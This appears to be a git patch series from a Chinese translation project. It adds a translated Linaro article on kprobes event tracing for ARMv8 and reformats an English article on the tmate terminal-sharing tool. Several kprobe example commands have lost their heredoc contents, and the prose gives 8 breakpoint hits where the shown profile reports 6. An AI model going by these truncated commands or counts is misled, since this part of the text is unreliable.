+这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 _arg1_。注意这个指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 + +### 例子: 函数入口和返回探测 + +Kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 X0 寄存器中,这是非常有用的。在 %x0 中返回值也可以被称为 _$retval_。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 + +使用 kprobes 和 kretprobe 检测内核 *_do_fork()* 函数来记录参数和结果的例子: + +``` +_$ cd /sys/kernel/debug/tracing +$ cat > kprobe_events < events/kprobes/enable_ +``` + +此时每次对 _do_fork() 的调用都会产生两个记录到 “_trace_” 文件的 kprobe 事件,一个报告调用参数值,另一个报告返回值。返回值在 trace 文件中将被标记为“_pid_”。这里是三次 fork 系统调用执行后的 trace 文件的内容: + +``` +_$ cat trace +# tracer: nop +# +# entries-in-buffer/entries-written: 6/6 #P:8 +# +# _—–=> irqs-off +# / _—-=> need-resched +# | / _—=> hardirq/softirq +# || / _–=> preempt-depth +# ||| / delay +# TASK-PID CPU# |||| TIMESTAMP FUNCTION +# | | | |||| | | + bash-1671 [001] d… 204.946007: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 + bash-1671 [001] d..1 204.946391: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x724 + bash-1671 [001] d… 208.845749: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 + bash-1671 [001] d..1 208.846127: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x725 + bash-1671 [001] d… 214.401604: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 + bash-1671 [001] d..1 214.401975: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x726_ +``` + +### 例子: 解引用指针参数 + +对于指针值,kprobes 事件处理子系统也允许解引用和打印所需的内存内容,适用于各种基本数据类型。为了展示所需字段,手动计算结构的偏移量是必要的。 + +检测 `_do_wait()` 函数: + +``` +_$ cat > kprobe_events < events/kprobes/enable_ +``` + +注意在第一个探针中使用的参数标签是可选的,并且可用于更清晰地识别记录在追踪日志中的信息。带符号的偏移量和括号表明了寄存器参数是指向记录在追踪日志中的内存内容的指针。“_:u32_”表明了内存位置包含一个无符号的4字节宽的数据(在这个例子中指局部定义的结构中的一个 emum 和一个 int) + +探针标签(冒号后)是可选的,并且将用来识别日志中的探针。对每个探针来说标签必须是独一无二的。如果没有指定,将从附近的符号名称自动生成一个有用的标签,如前面的例子所示。 + +也要注意“_$retval_”参数可以只是指定为“_%x0_”。 + +这里是两次 fork 系统调用执行后的 “_trace_” 文件的内容: + +``` +_$ cat trace +# tracer: nop +# +# entries-in-buffer/entries-written: 4/4 #P:8 +# +# _—–=> irqs-off +# / _—-=> need-resched +# | / _—=> hardirq/softirq +# || / _–=> preempt-depth +# ||| / delay +# TASK-PID CPU# |||| TIMESTAMP FUNCTION +# | | | |||| | | + bash-1702 [001] d… 175.342074: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xe + bash-1702 [002] d..1 175.347236: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0x757 + bash-1702 [002] d… 175.347337: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xf + bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6_ +``` + +### 例子: 探测任意指令地址 + +在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 arch/arm64/kernel/modules.c 中 _module_alloc_ 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: + +``` +_$ grep module_alloc System.map +ffff2000080951c4 T module_alloc +ffff200008297770 T kasan_module_alloc_ +``` + +在这个例子中我们使用了交叉开发工具,并且在我们的主机系统上调用 gdb 来检查指令包含我们感兴趣函数。 + +``` +_$ ${CROSS_COMPILE}gdb vmlinux +(gdb) x/30i 0xffff2000080951c4 + 0xffff2000080951c4 : sub sp, sp, #0x30 + 0xffff2000080951c8 : adrp x3, 0xffff200008d70000 + 0xffff2000080951cc : add x3, x3, #0x0 + 0xffff2000080951d0 : mov x5, #0x713 // #1811 + 0xffff2000080951d4 : mov w4, #0xc0 // #192 + 0xffff2000080951d8 : + mov x2, #0xfffffffff8000000 // #-134217728 + 0xffff2000080951dc : stp x29, x30, [sp,#16] 0xffff2000080951e0 : add x29, sp, #0x10 + 0xffff2000080951e4 : movk x5, #0xc8, lsl #48 + 0xffff2000080951e8 : movk w4, #0x240, lsl #16 + 0xffff2000080951ec : str x30, [sp] 0xffff2000080951f0 : mov w7, #0xffffffff // #-1 + 0xffff2000080951f4 : mov x6, #0x0 // #0 + 0xffff2000080951f8 : add x2, x3, x2 + 0xffff2000080951fc : mov x1, #0x8000 // #32768 + 0xffff200008095200 : stp x19, x20, [sp,#32] 0xffff200008095204 : mov x20, x0 + 0xffff200008095208 : bl 0xffff2000082737a8 <__vmalloc_node_range> + 0xffff20000809520c : mov x19, x0 + 0xffff200008095210 : cbz x0, 0xffff200008095234 + 0xffff200008095214 : mov x1, x20 + 0xffff200008095218 : bl 0xffff200008297770 + 0xffff20000809521c : tbnz w0, #31, 0xffff20000809524c + 0xffff200008095220 : mov sp, x29 + 0xffff200008095224 : mov x0, x19 + 0xffff200008095228 : ldp x19, x20, [sp,#16] 0xffff20000809522c : ldp x29, x30, [sp],#32 + 0xffff200008095230 : ret + 0xffff200008095234 : mov sp, x29 + 0xffff200008095238 : mov x19, #0x0 // #0_ +``` + +在这种情况下,我们将在此函数中显示以下源代码行的结果: + +``` +_p = __vmalloc_node_range(size, MODULE_ALIGN, VMALLOC_START, +VMALLOC_END, GFP_KERNEL, PAGE_KERNEL_EXEC, 0, +NUMA_NO_NODE, __builtin_return_address(0));_ +``` + +…以及在此代码行的函数调用的返回值: + +``` +_if (p && (kasan_module_alloc(p, size) < 0)) {_ +``` + +我们可以在从调用外部函数的汇编代码中识别这些。为了展示这些值,我们将在目标系统上的0xffff20000809520c 和 0xffff20000809521c 处放置探针。 + +``` +_$ cat > kprobe_events < events/kprobes/enable_ +``` + +现在将一个以太网适配器加密狗插入到 USB 端口后,我们看到以下写入追踪日志的内容: + +``` +_$ cat trace +# tracer: nop +# +# entries-in-buffer/entries-written: 12/12 #P:8 +# +# _—–=> irqs-off +# / _—-=> need-resched +# | / _—=> hardirq/softirq +# || / _–=> preempt-depth +# ||| / delay +# TASK-PID CPU# |||| TIMESTAMP FUNCTION +# | | | |||| | | + systemd-udevd-2082 [000] d… 77.200991: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001188000 + systemd-udevd-2082 [000] d… 77.201059: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 + systemd-udevd-2082 [000] d… 77.201115: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001198000 + systemd-udevd-2082 [000] d… 77.201157: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 + systemd-udevd-2082 [000] d… 77.227456: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011a0000 + systemd-udevd-2082 [000] d… 77.227522: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 + systemd-udevd-2082 [000] d… 77.227579: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011b0000 + systemd-udevd-2082 [000] d… 77.227635: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 + modprobe-2097 [002] d… 78.030643: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011b8000 + modprobe-2097 [002] d… 78.030761: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 + modprobe-2097 [002] d… 78.031132: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001270000 + modprobe-2097 [002] d… 78.031187: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0_ +``` + +Kprobes 事件系统的另一个功能是记录统计信息,这可在 inkprobe_profile 中找到。在以上追踪后,该文件的内容为: + +``` +_$ cat kprobe_profile + p_0xffff20000809520c 6 0 +p_0xffff20000809521c 6 0_ +``` + +这表明我们设置的两处断点每个共发生了 8 次击中,这当然与追踪日志数据是一致的。在 kprobetrace 文档中有更多 kprobe_profile 的功能描述。 + +也可以进一步过滤 kprobes 事件。用来控制这点的 debugfs 文件在 kprobetrace 文档中被列出,然而他们内容的详细信息大多在 trace events 文档中被描述。 + +### 总结 + +现在,Linux ARMv8 对支持 kprobes 功能也和其它架构相当。有人正在做添加 uprobes 和 systemtap 支持的工作。这些功能/工具和其他已经完成的功能(如: perf, coresight)允许 Linux ARMv8 用户像在其它更老的架构上一样调试和测试性能。 + +* * * + +参考文献 + +[[1]][5] Jim Keniston, Prasanna S. Panchamukhi, Masami Hiramatsu. “Kernel Probes (Kprobes).” _GitHub_. GitHub, Inc., 15 Aug. 2016\. Web. 13 Dec. 2016. + +[[2]][6] Ts’o, Theodore, Li Zefan, and Tom Zanussi. “Event Tracing.” _GitHub_. GitHub, Inc., 3 Mar. 2016\. Web. 13 Dec. 2016. + +[[3]][7] Hiramatsu, Masami. “Kprobe-based Event Tracing.” _GitHub_. GitHub, Inc., 18 Aug. 2016\. Web. 13 Dec. 2016. + + +---------------- + +作者简介 : [David Long][8] David在 Linaro Kernel - Core Development 团队中担任工程师。 在加入 Linaro 之前,他在商业和国防行业工作了数年,既做嵌入式实时工作又为Unix提供软件开发工具。之后,在 Digital(又名 Compaq)公司工作了十几年,负责 Unix 标准,C 编译器和运行时库的工作。之后 David 又去了一系列初创公司做嵌入式 Linux 和安卓系统,嵌入式定制操作系统和 Xen 虚拟化。他拥有 MIPS,Alpha 和 ARM 平台的经验(等等)。他使用过从 1979 年贝尔实验室 V6 开始的大部分Unix操作系统,并且长期以来一直是 Linux 用户和倡导者。他偶尔也因使用烙铁和数字示波器调试设备驱动而知名。 + +-------------------------------------------------------------------------------- + +via: http://www.linaro.org/blog/kprobes-event-tracing-armv8/ + +作者:[ David Long][a] +译者:[kimii](https://github.com/kimii) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linaro.org/author/david-long/ +[1]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/# +[2]:https://github.com/torvalds/linux/blob/master/Documentation/kprobes.txt +[3]:https://github.com/torvalds/linux/blob/master/Documentation/trace/events.txt +[4]:https://github.com/torvalds/linux/blob/master/Documentation/trace/kprobetrace.txt +[5]:https://github.com/torvalds/linux/blob/master/Documentation/kprobes.txt +[6]:https://github.com/torvalds/linux/blob/master/Documentation/trace/events.txt +[7]:https://github.com/torvalds/linux/blob/master/Documentation/trace/kprobetrace.txt +[8]:http://www.linaro.org/author/david-long/ +[9]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/#comments +[10]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/# +[11]:http://www.linaro.org/tag/arm64/ +[12]:http://www.linaro.org/tag/armv8/ +[13]:http://www.linaro.org/tag/jprobes/ +[14]:http://www.linaro.org/tag/kernel/ +[15]:http://www.linaro.org/tag/kprobes/ +[16]:http://www.linaro.org/tag/kretprobes/ +[17]:http://www.linaro.org/tag/perf/ +[18]:http://www.linaro.org/tag/tracing/ From dbd2f1ef5eb0acb09fe4083307f9988606bf2516 Mon Sep 17 00:00:00 2001 From: HankChow Date: Wed, 29 Nov 2017 16:48:57 +0800 Subject: [PATCH 0062/1627] HankChow translating --- sources/tech/20171124 How do groups work on Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171124 How do groups work on Linux.md b/sources/tech/20171124 How do groups work on Linux.md index bc1833b0d6..3e9c386e01 100644 --- a/sources/tech/20171124 How do groups work on Linux.md +++ b/sources/tech/20171124 How do groups work on Linux.md @@ -1,3 +1,5 @@ +HankChow Translating + How do groups work on Linux? ============================================================ From f863dfbcd9801da5b49fe1fd356dc14871080b1a Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 29 Nov 2017 17:35:54 +0800 Subject: [PATCH 0063/1627] =?UTF-8?q?=E8=B0=83=E6=95=B4=E6=A0=BC=E5=BC=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...our Terminal Session To Anyone In Seconds.md | 597 +++--------------- 1 file changed, 85 insertions(+), 512 deletions(-) diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index efa99115b8..b4747d8a65 100644 --- a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -1,150 +1,15 @@ -::: {#wrapper} -::: {.mobile-title-logo-in-header} -[![2daygeek.com](https://www.2daygeek.com/wp-content/uploads/2015/12/2day-geek-new-logo-final.png)](https://www.2daygeek.com/ "2daygeek.com | Home page"){.custom-logo-link} -::: - -::: {.ham__navbar-toggler-two .collapsed title="Menu" aria-expanded="false"} -::: {.ham__navbar-span-wrapper} -[]{.line .line-1} []{.line .line-2} []{.line .line-3} -::: -::: - -::: {.nav-text} -::: - -::: {.nav-wrap .container} --
- -
- - - -- [[LINUX - DISTRO'S](https://www.2daygeek.com/category/linux-distributions/)]{#menu-item-6808} -- [[LINUX - COMMAND'S](https://www.2daygeek.com/category/linux-commands/)]{#menu-item-6806} -- [[WEBSERVER](https://www.2daygeek.com/category/webserver/)]{#menu-item-9582} -- [[MONITORING - TOOLS](https://www.2daygeek.com/category/monitoring-tools/)]{#menu-item-6809} -- [[PACKAGE - MANAGEMENT](https://www.2daygeek.com/category/package-management/)]{#menu-item-6883} -- [[REPOSITORY](https://www.2daygeek.com/category/repository/)]{#menu-item-6811} -- [[CLOUD - STORAGE](https://www.2daygeek.com/category/free-cloud-storage/)]{#menu-item-6986} -- [[HACKING](https://gbhackers.com/)]{#menu-item-14871} - - [[Tutorials](https://gbhackers.com/)]{#menu-item-14872} -::: - -::: {.nav-text} -::: - -::: {.topbar-toggle-down} -::: - -::: {.nav-wrap .container} -- [[HOME](https://www.2daygeek.com/)]{#menu-item-293} -- [[LINUX NEWS](http://linuxnews.2daygeek.com/)]{#menu-item-10920} -- [[ABOUT US](https://www.2daygeek.com/about-us/)]{#menu-item-294} -- [[CONTACT US](https://www.2daygeek.com/contact-us/)]{#menu-item-295} -- [[DISCLAIMER](https://www.2daygeek.com/disclaimer/)]{#menu-item-296} -- [[PRIVACY - POLICY](https://www.2daygeek.com/privacy-policy/)]{#menu-item-3676} -- [[SUPPORT - US](https://www.2daygeek.com/support-us/)]{#menu-item-2729} -- [[OS - TWEAK](https://www.2daygeek.com/category/os-tweaks/)]{#menu-item-8366} -- [[ICONS](https://www.2daygeek.com/category/icon-theme/)]{#menu-item-12012} -- [[THEMES](https://www.2daygeek.com/category/gtk-theme/)]{#menu-item-12013} -::: - -::: {#topbar-header-search .container} -::: {.container-inner} -::: {.toggle-search} -::: - -::: {.search-expand} -::: {.search-expand-inner} -
- -
-::: -::: -::: -::: - -::: {.container .group} -::: {.container-inner} -::: {.group .pad .central-header-zone} -::: {.logo-tagline-group} -[![2daygeek.com](https://www.2daygeek.com/wp-content/uploads/2015/12/2day-geek-new-logo-final.png)](https://www.2daygeek.com/ "2daygeek.com | Home page"){.custom-logo-link} -::: - -::: {#header-widgets} -::: {style="float:left;border:solid 0px;height:90px;width:728px;"} -[]{.underline} -::: -::: -::: - -::: {.nav-text} -::: - -::: {.nav-wrap .container} -- [LINUX - DISTRO'S](https://www.2daygeek.com/category/linux-distributions/) -- [LINUX COMMAND'S](https://www.2daygeek.com/category/linux-commands/) -- [WEBSERVER](https://www.2daygeek.com/category/webserver/) -- [MONITORING - TOOLS](https://www.2daygeek.com/category/monitoring-tools/) -- [PACKAGE - MANAGEMENT](https://www.2daygeek.com/category/package-management/) -- [REPOSITORY](https://www.2daygeek.com/category/repository/) -- [CLOUD - STORAGE](https://www.2daygeek.com/category/free-cloud-storage/) -- [HACKING](https://gbhackers.com/) - - [Tutorials](https://gbhackers.com/) -::: -::: -::: - -::: {#page .container} -::: {.container-inner} -::: {.main} -::: {.main-inner .group} -::: {.section .content} -::: {.page-title .pad .group} -- [Apps](https://www.2daygeek.com/category/apps/) -::: - -::: {.pad .group} -::: {.post-inner .group} -tmate -- Instantly Share Your Terminal Session To Anyone In Seconds {#tmate-instantly-share-your-terminal-session-to-anyone-in-seconds .post-title .entry-title} -=================================================================== - -by [ [[Magesh -Maruthamuthu](https://www.2daygeek.com/author/magesh/ "Posts by Magesh Maruthamuthu")]{.fn} -]{.vcard .author} · [Published : November 28, 2017 \|\| Last Updated: -November 28, 2017]{.published} - -::: {.clear} -::: - -::: {.entry .themeform} -::: {.entry-inner} -::: {style="float:left;margin:10px 10px 10px 0;"} -[]{.underline} -::: +tmate -- Instantly Share Your Terminal Session To Anyone In Seconds +================= A while ago, we wrote about [teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) -which is used to share terminal instantly to anyone (whoever you -trusting). Today also we are going to discuss about same kind of +which is used to share terminal instantly to anyone (whoever you trusting). Today also we are going to discuss about same kind of application called tmate. Why you want tmate application? this will help you to get help from your friends when you need. -#### What Is tmate? +### What Is tmate? [tmate](https://tmate.io/) stands for teammates, it's a fork of tmux, and uses the same configurations such as keybindings, color schemes etc. @@ -160,7 +25,7 @@ or several teammates. A status line at the bottom of the screen shows information on the current session, such as ssh command to share with your mate. -#### How tmate works? +### How tmate works? - When launching tmate, an ssh connection is established to tmate.io (backend servers maintained by tmate developers) in the background @@ -173,438 +38,146 @@ current session, such as ssh command to share with your mate. - teammates can connect to tmate.io using the SSH session ID provided by user -#### Prerequisites for tmate +### Prerequisites for tmate Generate SSH key as a prerequisites since tmate.io server authenticate client machine through local ssh keys. Make a note, every system should have SSH key. +```shell +$ ssh-keygen -t rsa +Generating public/private rsa key pair. +Enter file in which to save the key (/home/magi/.ssh/id_rsa): +Enter passphrase (empty for no passphrase): +Enter same passphrase again: +Your identification has been saved in /home/magi/.ssh/id_rsa. +Your public key has been saved in /home/magi/.ssh/id_rsa.pub. +The key fingerprint is: +SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 [email protected] +The key's randomart image is: ++---[RSA 2048]----+ +| | +| | +| . | +| . . = o | +| *ooS= . + o | +| . [email protected]*o.o.+ E .| +| =o==B++o = . | +| o.+*o+.. . | +| ..o+o=. | ++----[SHA256]-----+ +``` - $ ssh-keygen -t rsa - Generating public/private rsa key pair. - Enter file in which to save the key (/home/magi/.ssh/id_rsa): - Enter passphrase (empty for no passphrase): - Enter same passphrase again: - Your identification has been saved in /home/magi/.ssh/id_rsa. - Your public key has been saved in /home/magi/.ssh/id_rsa.pub. - The key fingerprint is: - SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 [email protected] - The key's randomart image is: - +---[RSA 2048]----+ - | | - | | - | . | - | . . = o | - | *ooS= . + o | - | . [email protected]*o.o.+ E .| - | =o==B++o = . | - | o.+*o+.. . | - | ..o+o=. | - +----[SHA256]-----+ - -#### How to Install tmate +### How to Install tmate tmate is available in few of the distribution official repository that can be installed through package manager. -For **`Debian/Ubuntu`**, use [APT-GET -Command](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) -or [APT -Command](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to -install tmate. +For **`Debian/Ubuntu`**, use [APT-GET Command](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) +or [APT Command](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to install tmate. -::: {style="float:left;margin:10px 10px 10px 0;"} -[]{.underline} -::: +```shell +$ sudo apt-get install software-properties-common +$ sudo add-apt-repository ppa:tmate.io/archive +$ sudo apt-get update +$ sudo apt-get install tmate +``` - $ sudo apt-get install software-properties-common - $ sudo add-apt-repository ppa:tmate.io/archive - $ sudo apt-get update - $ sudo apt-get install tmate +Also, you can install tmate package from distribution official repository. -Also, you can install tmate package from distribution official -repository. +```shell +$ sudo apt-get install tmate +``` - $ sudo apt-get install tmate - -For **`Fedora`**, use [DNF -Command](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) +For **`Fedora`**, use [DNF Command](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) to install tmate. - $ sudo dnf install tmate +```shell +$ sudo dnf install tmate +``` -For **`Arch Linux`** based systems, use []()[Yaourt -Command](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) -or []()[Packer -Command](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) +For **`Arch Linux`** based systems, use []()[Yaourt Command](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) +or []()[Packer Command](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) to install tmate from AUR repository. - $ yaourt -S tmate - or - $ packer -S tmate +```shell +$ yaourt -S tmate +``` +or -For **`openSUSE`**, use [Zypper -Command](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) +```shell +$ packer -S tmate +``` + +For **`openSUSE`**, use [Zypper Command](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) to install tmate. - $ sudo zypper in tmate +```shell +$ sudo zypper in tmate +``` -#### How To Use tmate +### How To Use tmate After successfully installed, open your terminal and fire the following command which will open the new session for you and in the bottom of the screen you can able to see the SSH session ID. - $ tmate +```shell +$ tmate +``` -[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15269 width="1051" -height="643"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15269 width="1051" -height="643"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) +[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) Make a note, the SSH session ID will disappear after a few seconds, so don't worry you can get those details using following command. -::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} -[]{.underline} -::: - - $ tmate show-messages +```shell +$ tmate show-messages +``` The tmate show-messages command allows you to see tmate's log messages, including the ssh connection string.\ -[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15270 width="1051" -height="643"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15270 width="1051" -height="643"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) +[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) Now, share your SSH session ID to your friends or coworkers and allow them to view the terminal session. Not only SSH session ID, alternatively you can share web URL as well, also you can share either read only sessions or read-write sessions? -#### How to connect session through SSH +### How to connect session through SSH Just run the SSH session ID which you got from your friend on terminal. It's like similar to below. - $ ssh session: ssh [email protected] +```shell +$ ssh session: ssh [email protected] +``` -[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15273 width="869" -height="625"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15273 width="869" -height="625"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) +[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) -#### How to connect session through Web URL +### How to connect session through Web URL Open the browser and access the URL which you got from your friend. It's like similar to below.\ -[![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15274 width="1024" -height="708"}![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.aligncenter -.size-full .wp-image-15274 width="1024" -height="708"}](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) +[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) -::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} -::: Just type `exit` to exit from the session. -::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} -::: +``` +[Source System Output] +[exited] - [Source System Output] - [exited] - - [Remote System Output] - [server exited] - Connection to sg2.tmate.io closed by remote host. - Connection to sg2.tmate.io closed. - -::: {style="float:none;margin:10px 0 10px 0;text-align:center;"} -[]{.underline} -::: - -::: {style="font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both"} -::: -::: - -::: {.clear} -::: -::: -::: - -::: {.clear} -::: - -Tags: [Application](https://www.2daygeek.com/tag/application/)[Instant -terminal -sharing](https://www.2daygeek.com/tag/instant-terminal-sharing/)[Linux](https://www.2daygeek.com/tag/linux/)[tmate](https://www.2daygeek.com/tag/tmate/) - -::: {.author-bio} -::: {.bio-avatar} -![](https://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif){.avatar -.avatar-128 .photo width="128" height="128" -srcset="https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=256&d=mm&r=g 2x"} - -![](https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=128&d=mm&r=g){.avatar -.avatar-128 .photo width="128" height="128" -srcset="https://secure.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=256&d=mm&r=g 2x"} -::: - -Magesh Maruthamuthu - -Love to play with all Linux distribution - -::: {.clear} -::: -::: - -- - [**Previous story** How To Empty a File, Delete N Lines From a - File, Remove Matching String From a File, And Remove Empty/Blank - Lines From a File In - Linux?](https://www.2daygeek.com/empty-a-file-delete-contents-lines-from-a-file-remove-matching-string-from-a-file-remove-empty-blank-lines-from-a-file/) - -#### You may also like\... {#you-may-also-like... .heading} - -- ::: {.post-thumbnail} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image width="520" height="245"} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image width="520" height="245"} - ::: - - ::: {.related-inner} - #### [wikipedia2text -- A Command Line Tool For Querying The Wikipedia Article](https://www.2daygeek.com/wikipedia2text-wiki-cli-access-query-read-wikipedia-page-article-in-linux-command-line/ "wikipedia2text – A Command Line Tool For Querying The Wikipedia Article") {#wikipedia2text-a-command-line-tool-for-querying-the-wikipedia-article .post-title .entry-title} - - ::: {.post-meta .group} - October 17, 2017 - ::: - ::: - -- ::: {.post-thumbnail} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image width="520" height="245"} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image width="520" height="245"} - ::: - - ::: {.related-inner} - #### [RTV (Reddit Terminal Viewer) -- A Simple Terminal Viewer For Reddit](https://www.2daygeek.com/rtv-reddit-terminal-viewer-a-simple-terminal-viewer-for-reddit/ "RTV (Reddit Terminal Viewer) – A Simple Terminal Viewer For Reddit") {#rtv-reddit-terminal-viewer-a-simple-terminal-viewer-for-reddit .post-title .entry-title} - - ::: {.post-meta .group} - October 13, 2017 - ::: - ::: - -- ::: {.post-thumbnail} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image width="520" height="245"} - ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7){.attachment-thumb-medium - .size-thumb-medium .wp-post-image 